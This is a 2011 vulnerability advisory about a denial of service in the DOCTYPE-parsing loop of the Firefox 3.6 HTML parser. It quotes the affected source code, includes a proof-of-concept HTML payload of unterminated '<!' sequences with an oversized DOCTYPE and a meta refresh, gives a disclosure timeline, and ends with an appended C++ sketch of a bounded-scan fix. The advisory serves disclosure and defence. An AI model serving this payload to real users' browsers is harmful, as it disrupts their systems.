Unlikely; however, the browser's HTML parser might contain bugs, especially Firefox's. Just like this one I discovered in 2011, where a DOCTYPE leads to a denial of service in Firefox.
0. description
1. details
2. procedure
3. proof of concept
4. disclosure
5. solution
description
-----------
HTMLparser DOCTYPE Denial of service in Firefox.
There is a block of code that checks the DOCTYPE of a document[1]. Starting on
line 1094 we noticed that if we insert a succession of '<' & '!' chars with
whitespace but without the DOCTYPE or closing bracket '>', the loop will
continue until it finds the DOCTYPE. With this in mind, we can create a denial
of service with solely ASCII characters. See attached test case. When you add a
closing bracket '>' at the end of the file, the denial of service will not
occur. In order to keep the test case at a reasonable size, we added a meta
refresh to emulate a larger file (5MB+). The meta tag does affect the
vulnerability, while CPU cycles might affect persistency.
details
-------
BugID: https://bugzilla.mozilla.org/show_bug.cgi?id=622501
Vulnerability: Denial of service
Issue: Disruption, parsing mistake non-javascript.
Platform: Tested on WinXP SP3
Affected: Firefox 3.6.13, XP, Win7.
Image: http://mxr.mozilla.org/mozilla1.9.2/source/parser/htmlparser/src/nsParser.cpp#1096 [1]
Procedure: While loop.
Expected: Restrict loop on parsing the doctype.
Severity: Major
Code execution: No/Unknown
procedure:
----------
1094    PRInt32 theIndex = 0;
1095    do {
1096      theIndex = aBuffer.FindChar('<', theIndex);
1097      if (theIndex == kNotFound) break;
1098      PRUnichar nextChar = aBuffer.CharAt(theIndex+1);
1099      if (nextChar == PRUnichar('!')) {
1100        PRInt32 tmpIndex = theIndex + 2;
1101        if (kNotFound !=
1102            (theIndex=aBuffer.Find("DOCTYPE", PR_TRUE, tmpIndex, 0))) {
1103          haveDoctype = PR_TRUE;
1104          theIndex += 7; // skip "DOCTYPE"
1105          break;
1106        }
1107        theIndex = ParsePS(aBuffer, tmpIndex);
1108        theIndex = aBuffer.FindChar('>', theIndex);
1109      } else if (nextChar == PRUnichar('?')) {
1110        theIndex = aBuffer.FindChar('>', theIndex);
1111      } else {
1112        break;
1113      }
1114    } while (theIndex != kNotFound);
proof of concept
----------------
Redacted to fit.
See the Bugzilla page for an example.
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <! <!<! <!<! <!<! <!<!<!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <! <!<
! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <! <!<! <!<! <!<! <!<! <!<
! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <! <!<! <!<! <!<
! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <! <!<
! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<! <!<! <!<! <!<! <!<! <!<! <!
<! <!<! <!<! <!<! <!<! <!<! <!<!
<!<!DOCTYPE HTML PUBLIC
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd"
<meta http-equiv="refresh" content="0;URL="
disclosure
----------
2011-01-03 01:03 PST - Bug filed.
2011-01-07 05:07 GMT+1 - Disclosure non-critical.
solution
--------
None yet.
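
The "Expected: Restrict loop on parsing the doctype" item above, sketched as an added example (not Mozilla's code and not part of the original advisory): a simplified prolog scan whose single cursor only moves forward and which gives up after a fixed byte budget. The names sniff_doctype, SniffResult and match_ci and the 1024-byte default are assumptions made for illustration.

```cpp
#include <cctype>
#include <cstddef>
#include <cstdio>
#include <string>

struct SniffResult {
    bool have_doctype;     // "<!DOCTYPE" seen in the prolog
    bool budget_hit;       // gave up because the byte budget ran out
    std::size_t examined;  // cursor position at exit, never past the budget
};

// Case-insensitive match of an upper-case keyword at buf[pos].
static bool match_ci(const std::string& buf, std::size_t pos, const char* word) {
    for (std::size_t i = 0; word[i] != '\0'; ++i) {
        if (pos + i >= buf.size()) return false;
        if (std::toupper(static_cast<unsigned char>(buf[pos + i])) != word[i]) return false;
    }
    return true;
}

// Simplified prolog scan (assumed model): skips "<?...>" and "<!...>" until it
// meets "<!DOCTYPE", an ordinary tag, or the end of the budget window.
SniffResult sniff_doctype(const std::string& buf, std::size_t budget = 1024) {
    const std::size_t limit = buf.size() < budget ? buf.size() : budget;
    SniffResult r = {false, false, 0};
    std::size_t i = 0;  // single cursor that only moves forward
    while (i < limit) {
        while (i < limit && buf[i] != '<') ++i;
        if (i + 1 >= limit) { i = limit; break; }
        const char next = buf[i + 1];
        if (next == '!' && match_ci(buf, i + 2, "DOCTYPE")) {
            r.have_doctype = true;
            break;
        }
        if (next != '!' && next != '?') break;   // ordinary markup: prolog is over
        i += 2;
        while (i < limit && buf[i] != '>') ++i;  // unterminated: runs into limit
    }
    r.examined = i;
    r.budget_hit = !r.have_doctype && i >= limit && limit < buf.size();
    return r;
}

int main() {
    std::string unterminated;  // constructed sample: "<! " repeated, no '>'
    for (int n = 0; n < 100000; ++n) unterminated += "<! ";
    unterminated += "<!DOCTYPE html>";
    const SniffResult r = sniff_doctype(unterminated);
    std::printf("doctype=%d budget_hit=%d examined=%zu\n", r.have_doctype, r.budget_hit, r.examined);
    return 0;
}
```

Because the cursor never moves backwards and stops at the budget, the work per call is bounded by the budget regardless of how large the unterminated input is.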